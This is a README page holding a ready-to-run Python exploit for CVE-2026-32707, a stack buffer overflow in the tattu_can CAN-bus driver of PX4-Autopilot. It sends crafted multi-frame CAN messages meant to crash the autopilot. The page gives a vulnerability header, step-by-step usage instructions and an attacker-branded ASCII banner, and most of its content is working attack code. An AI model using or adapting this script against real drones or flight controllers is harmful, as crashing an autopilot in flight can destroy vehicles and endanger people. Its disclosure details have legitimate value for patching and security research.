README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit Title: PX4-Autopilot tattu_can Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32707
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected: versions <= 1.17.0-rc1 (tattu_can driver)
# Tested on: Ubuntu 22.04 / PX4 SITL with vcan0
# Category: Denial of Service (DoS)
# Platform: Linux (SocketCAN)
# Exploit Type: Stack Overflow
# CVSS: 7.5 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
# CWE: CWE-121 (Stack-based Buffer Overflow)
# Description: The tattu_can driver in PX4-Autopilot versions <=1.17.0-rc1
# performs an unbounded memcpy when reassembling multi‑frame CAN messages,
# allowing an attacker with CAN bus access to corrupt the stack and crash
# the autopilot.
# Fixed in: commit 3f04b7a (PX4-Autopilot 1.17.0-rc2)
# Usage:
# python3 exploit.py <can_interface>
# Examples:
# python3 exploit.py vcan0
# python3 exploit.py can0
# Options:
# <can_interface> - name of the CAN network interface (e.g., vcan0, can0)
# Notes:
# - Requires python-can library: pip install python-can
# - Run with root privileges (CAP_NET_RAW)
# - The target must have tattu_can started (e.g., 'tattu_can start')
# How to Use
# Step 1: Install python-can: pip install python-can
# Step 2: Create virtual CAN if needed: sudo ip link add dev vcan0 type vcan && sudo ip link set up vcan0
# Step 3: Run: sudo python3 exploit.py vcan0
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║
║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║
║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║
║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║
║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║
║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║
║ ║
║ [ b a n y a m e r _ s e c u r i t y ] ║
║ ║
║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║
║ ║
║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ Exploit : CVE-2026-32707 ║
║ Target : PX4-Autopilot • tattu_can driver • CAN bus ║
║ ║
║ Status : ACTIVE ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import sys
import can
import time
TAIL_BYTE_START_OF_TRANSFER = 0x80
TATTLES_STRUCT_SIZE = 48
START_OFFSET = 5
OVERFLOW_DLC = 8
CAN_ID = 0x123
def main():
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <can_interface>")
sys.exit(1)
iface = sys.argv[1]
try:
bus = can.interface.Bus(channel=iface, bustype='socketcan', fd=False)
except Exception as e:
print(f"Failed to open CAN interface {iface}: {e}")
sys.exit(1)
print(f"[*] Sending start-of-transfer frame on {iface} (can_id=0x{CAN_ID:08X})")
start_frame = can.Message(
arbitration_id=CAN_ID | can.CAN_EFF_FLAG,
data=[0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x00, TAIL_BYTE_START_OF_TRANSFER],
is_extended_id=True,
dlc=8
)
bus.send(start_frame)
print(f"[*] Sending 7 overflow frames (each copies {OVERFLOW_DLC - 1} bytes)...")
for i in range(7):
payload = [ord('A') + (i % 26)] * OVERFLOW_DLC
frame = can.Message(
arbitration_id=CAN_ID | can.CAN_EFF_FLAG,
data=payload,
is_extended_id=True,
dlc=OVERFLOW_DLC
)
bus.send(frame)
time.sleep(0.01)
final_payload = [0x42] * OVERFLOW_DLC
final_frame = can.Message(
arbitration_id=CAN_ID | can.CAN_EFF_FLAG,
data=final_payload,
is_extended_id=True,
dlc=OVERFLOW_DLC
)
print("[*] Sending final overflow frame...")
bus.send(final_frame)
print("[+] Attack sequence completed. The PX4 tattu_can driver should now crash.")
bus.shutdown()
if __name__ == "__main__":
main()